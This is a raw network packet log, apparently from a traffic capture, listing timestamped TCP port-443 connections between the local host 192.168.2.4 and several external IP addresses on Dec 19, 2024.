                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.931062937 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.931076050 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.227406025 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.227670908 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.227700949 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.229163885 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.229231119 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.230719090 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.230806112 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.230879068 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.230886936 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.270948887 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.330724955 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.330964088 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.330974102 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.331876040 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.331944942 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.332235098 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.332287073 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.332360983 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.332366943 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.379741907 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.459167957 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.462172031 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.462188959 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.463633060 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.463745117 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.464323044 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.464512110 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.464557886 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.511552095 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.511574984 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.557420969 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.690782070 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.690972090 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.693325043 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.693636894 CET49813443192.168.2.4172.67.74.152
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.693677902 CET44349813172.67.74.152192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.721515894 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.721867085 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.721883059 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.722539902 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.722973108 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.723057032 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.723186970 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.767344952 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.769047976 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835541964 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835613012 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835793018 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835892916 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835906029 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.908901930 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.909265041 CET49815443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.909332037 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.909709930 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.910032988 CET49815443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.910106897 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.910159111 CET49815443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.912451029 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.913132906 CET49816443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.913168907 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.913640022 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.913999081 CET49816443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.914091110 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.914222956 CET49816443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.914263964 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.955338001 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.958491087 CET49815443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.974725008 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.974803925 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.974915981 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.976309061 CET49811443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.976351023 CET4434981113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.980554104 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.980596066 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.980757952 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.980932951 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.980947018 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.029953003 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042295933 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042330027 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042411089 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042443037 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042467117 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042520046 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.042560101 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.043080091 CET49812443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.043104887 CET4434981213.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.165822029 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.166110992 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.166111946 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.166137934 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.166306019 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.166321993 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.167140961 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.167217970 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.167762995 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.167826891 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168344021 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168401957 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168629885 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168659925 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168706894 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168804884 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168863058 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.168898106 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.183844090 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.183965921 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.184111118 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.184146881 CET4434981435.190.80.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.184171915 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.184231997 CET49814443192.168.2.435.190.80.1
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.222851038 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.222851038 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.222858906 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.222871065 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.268657923 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.268659115 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.386672974 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.387326002 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.387413025 CET49815443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.387868881 CET49815443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.387895107 CET44349815104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.390767097 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.390822887 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.391403913 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.391598940 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.391612053 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.431571960 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.431864977 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.431967020 CET49816443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.432681084 CET49816443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.432712078 CET44349816104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.630389929 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.658726931 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.658813953 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.658833981 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.658864975 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.658910990 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.658951044 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.703373909 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760288954 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760494947 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760566950 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760615110 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760638952 CET44349819216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760649920 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.760698080 CET49819443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.800894022 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.800961971 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.801004887 CET49824443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.801064014 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.801117897 CET44349824142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.801218987 CET49824443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.802896023 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.802928925 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.803805113 CET49824443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.803833961 CET44349824142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909888029 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909998894 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.910094023 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.910368919 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.910403967 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.934907913 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.988497019 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.988522053 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.991277933 CET49827443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.991370916 CET44349827142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.991468906 CET49827443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.991687059 CET49827443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.991723061 CET44349827142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.034373999 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.052695036 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.052925110 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.052962065 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.053823948 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.053891897 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.054214954 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.054271936 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.054372072 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.054379940 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.095892906 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.126848936 CET44349818216.239.38.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.177088976 CET49818443192.168.2.4216.239.38.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.477955103 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.478171110 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.478188038 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.478488922 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.478760958 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.478817940 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.478871107 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.512475967 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.512545109 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.512608051 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.514133930 CET49820443192.168.2.4104.26.12.205
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.514158964 CET44349820104.26.12.205192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.519336939 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.519815922 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.606996059 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.607234001 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.607274055 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.608864069 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.609338045 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.609498024 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.609518051 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.609606981 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:38.653213024 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222281933 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222603083 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222726107 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222747087 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222799063 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222853899 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.222935915 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.224911928 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.224988937 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.225004911 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.225255013 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.225315094 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.226450920 CET49822443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.226485014 CET44349822104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.235524893 CET49828443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.235570908 CET44349828142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.235640049 CET49828443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.235893965 CET49828443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.235908031 CET44349828142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.239734888 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.239842892 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.239892960 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.241749048 CET49821443192.168.2.413.226.2.3
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.241760969 CET4434982113.226.2.3192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.247241020 CET49829443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.247356892 CET44349829104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.247442961 CET49829443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.247796059 CET49829443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.247828960 CET44349829104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.318563938 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.319499969 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.319559097 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.322729111 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.322824955 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.323280096 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.323380947 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.323581934 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.323604107 CET44349826216.239.34.21192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.363673925 CET49826443192.168.2.4216.239.34.21
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.375228882 CET49830443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.375308037 CET44349830104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.375428915 CET49830443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.375633955 CET49830443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.375657082 CET44349830104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.626231909 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.626735926 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.626802921 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.628331900 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.628431082 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630243063 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630336046 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630613089 CET49823443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630635023 CET44349823142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630644083 CET44349824142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630897045 CET49824443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.630937099 CET44349824142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.632437944 CET44349824142.250.181.70192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.632529020 CET49824443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.633714914 CET49824443192.168.2.4142.250.181.70
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:39.633807898 CET44349824142.250.181.70192.168.2.4
